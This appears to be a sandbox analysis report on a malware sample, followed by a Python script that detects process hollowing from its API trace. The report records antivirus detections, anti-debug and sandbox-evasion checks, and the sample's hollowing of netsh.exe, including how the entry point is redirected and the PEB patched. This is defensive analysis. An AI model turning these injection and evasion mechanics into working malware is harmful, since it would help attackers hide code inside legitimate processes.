protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02322000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02318000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02319000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2932
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c70000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
Elastic malicious (moderate confidence)
Cybereason malicious.98aef1
ESET-NOD32 a variant of MSIL/Kryptik.AEKM
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky UDS:DangerousObject.Multi.Generic
ZoneAlarm UDS:DangerousObject.Multi.Generic
Fortinet MSIL/Kryptik.AEKM!tr
BitDefenderTheta Gen:NN.ZemsilF.34264.Sn1@ae72hdn
section .text: virtual_address 0x00002000, virtual_size 0x0019e3d1, size_of_data 0x0019e400, entropy 7.06157802489 description A section with a high entropy has been found
entropy 0.960579710145 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\SysWOW64\netsh.exe"
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2932
region_size: 237568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
1 0 0
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 (0xC0000135 STATUS_DLL_NOT_FOUND: the Avast sandbox hook library is not loaded) 0

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 (0xC0000135 STATUS_DLL_NOT_FOUND) 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZ ... "This program cannot be run in DOS mode." ... Rich ... PE ... .text ... .rsrc (start of a PE image: DOS header, DOS stub, Rich header, PE header and section table; non-printable bytes not shown)
base_address: 0x00400000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2932
process_handle: 0x000002a8
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZ ... "This program cannot be run in DOS mode." ... Rich ... PE ... .text ... .rsrc (start of a PE image: DOS header, DOS stub, Rich header, PE header and section table; non-printable bytes not shown)
base_address: 0x00400000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0
Process injection Process 2780 called NtSetContextThread to modify thread in remote process 2932
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4314160
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002a4
process_identifier: 2932
1 0 0
Process injection Process 2780 resumed a thread in remote process 2932
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2932
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

thread_handle: 0x00000234
suspend_count: 1
process_identifier: 2780
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2780
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2780
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtSetContextThread

registers.eip: 1928014724
registers.esp: 2811704
registers.edi: 57035032
registers.eax: 59990016
registers.ebp: 2811748
registers.edx: 125
registers.ebx: 39620424
registers.esi: 56817997
registers.ecx: 39620508
thread_handle: 0x000000e8
process_identifier: 2780
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2780
1 0 0

CreateProcessInternalW

thread_identifier: 2936
thread_handle: 0x000002a4
process_identifier: 2932
current_directory:
filepath: C:\Windows\SysWOW64\netsh.exe
track: 1
command_line: "C:\Windows\SysWOW64\netsh.exe"
filepath_r: C:\Windows\SysWOW64\netsh.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000002a8
1 1 0

NtGetContextThread

thread_handle: 0x000002a4
1 0 0

NtAllocateVirtualMemory

process_identifier: 2932
region_size: 237568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
1 0 0

WriteProcessMemory

buffer: MZ ... "This program cannot be run in DOS mode." ... Rich ... PE ... .text ... .rsrc (start of a PE image: DOS header, DOS stub, Rich header, PE header and section table; non-printable bytes not shown)
base_address: 0x00400000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00429000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4314160
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002a4
process_identifier: 2932
1 0 0

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2932
1 0 0
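Added example, not code from the report or from the sandbox: reconstruct the hollowing chain above from a Cuckoo-style API trace and turn it into a verdict. The trace is transcribed from the calls shown (CreateProcessInternalW with CREATE_SUSPENDED, an RWX allocation at 0x00400000 in PID 2932, WriteProcessMemory of an MZ image, a 4-byte write at 0x7efde008, NtSetContextThread, NtResumeThread); buffers are abbreviated and the field names are the report's own. The x86 fact the check relies on: for a process created suspended, the initial thread's EAX holds the entry point and EBX the PEB, so EBX+8 is PEB.ImageBaseAddress. That is why the write the report renders as "@" lands at 0x7efde008: 0x00400000 little-endian is 00 00 40 00, and 0x40 is '@'.

```python
CREATE_SUSPENDED = 0x4
PAGE_EXECUTE_READWRITE = 0x40
PEB_IMAGE_BASE_OFFSET = 0x8   # x86 PEB: ImageBaseAddress is at PEB+8

# Constructed trace, values transcribed from the report's injection section.
TRACE = [
    {"api": "CreateProcessInternalW", "process_identifier": 2932,
     "filepath": r"C:\Windows\SysWOW64\netsh.exe", "creation_flags": 4,
     "thread_handle": 0x2a4, "process_handle": 0x2a8},
    {"api": "NtGetContextThread", "thread_handle": 0x2a4},
    {"api": "NtAllocateVirtualMemory", "process_identifier": 2932,
     "base_address": 0x00400000, "region_size": 237568, "protection": 64},
    {"api": "WriteProcessMemory", "process_identifier": 2932, "base_address": 0x00400000,
     "buffer": b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode."},
    {"api": "WriteProcessMemory", "process_identifier": 2932, "base_address": 0x00401000,
     "buffer": b"\x00" * 16},
    {"api": "WriteProcessMemory", "process_identifier": 2932, "base_address": 0x00429000,
     "buffer": b"\x00" * 16},
    # The "@" write: new image base 0x00400000 stored into PEB.ImageBaseAddress.
    {"api": "WriteProcessMemory", "process_identifier": 2932, "base_address": 0x7efde008,
     "buffer": (0x00400000).to_bytes(4, "little")},
    {"api": "NtSetContextThread", "process_identifier": 2932, "thread_handle": 0x2a4,
     "registers.eax": 4314160, "registers.ebx": 2130567168},
    {"api": "NtResumeThread", "process_identifier": 2932, "thread_handle": 0x2a4},
]


def find_hollowing(trace):
    """Walk the trace once, keyed on the PID of every CREATE_SUSPENDED child,
    and return a per-target summary with a verdict."""
    targets = {}
    for ev in trace:
        api = ev["api"]
        if api == "CreateProcessInternalW" and ev["creation_flags"] & CREATE_SUSPENDED:
            targets[ev["process_identifier"]] = {
                "image": ev["filepath"], "rwx_regions": [], "writes": [],
                "pe_written_at": None, "peb": None, "new_entry": None, "resumed": False,
            }
            continue
        t = targets.get(ev.get("process_identifier"))
        if t is None:
            continue  # call against some other process
        if api == "NtAllocateVirtualMemory" and ev["protection"] == PAGE_EXECUTE_READWRITE:
            t["rwx_regions"].append((ev["base_address"], ev["region_size"]))
        elif api == "WriteProcessMemory":
            t["writes"].append((ev["base_address"], ev["buffer"]))
            if ev["buffer"][:2] == b"MZ":
                t["pe_written_at"] = ev["base_address"]
        elif api == "NtSetContextThread":
            # x86 initial-thread CONTEXT of a suspended process: EAX = entry
            # point, EBX = PEB. Overwriting EAX redirects the first instruction.
            t["new_entry"] = ev["registers.eax"]
            t["peb"] = ev["registers.ebx"]
        elif api == "NtResumeThread":
            t["resumed"] = True

    for t in targets.values():
        # Was PEB.ImageBaseAddress pointed at the image the parent wrote?
        t["peb_patched"] = t["peb"] is not None and any(
            base == t["peb"] + PEB_IMAGE_BASE_OFFSET
            and int.from_bytes(buf[:4], "little") == t["pe_written_at"]
            for base, buf in t["writes"])
        # Does the new entry point fall inside an RWX region the parent allocated?
        t["entry_in_rwx"] = t["new_entry"] is not None and any(
            lo <= t["new_entry"] < lo + size for lo, size in t["rwx_regions"])
        hollowed = t["pe_written_at"] is not None and t["entry_in_rwx"] and t["resumed"]
        t["verdict"] = "process hollowing" if hollowed else "inconclusive"
    return targets


if __name__ == "__main__":
    for pid, t in find_hollowing(TRACE).items():
        print(pid, t["image"], t["verdict"], "image@%#x entry@%#x peb@%#x peb_patched=%s"
              % (t["pe_written_at"], t["new_entry"], t["peb"], t["peb_patched"]))
```

The verdict requires all three stages (image written, entry point redirected into the parent-allocated RWX region, thread resumed); a suspended child that is merely inspected with NtGetContextThread and resumed stays "inconclusive".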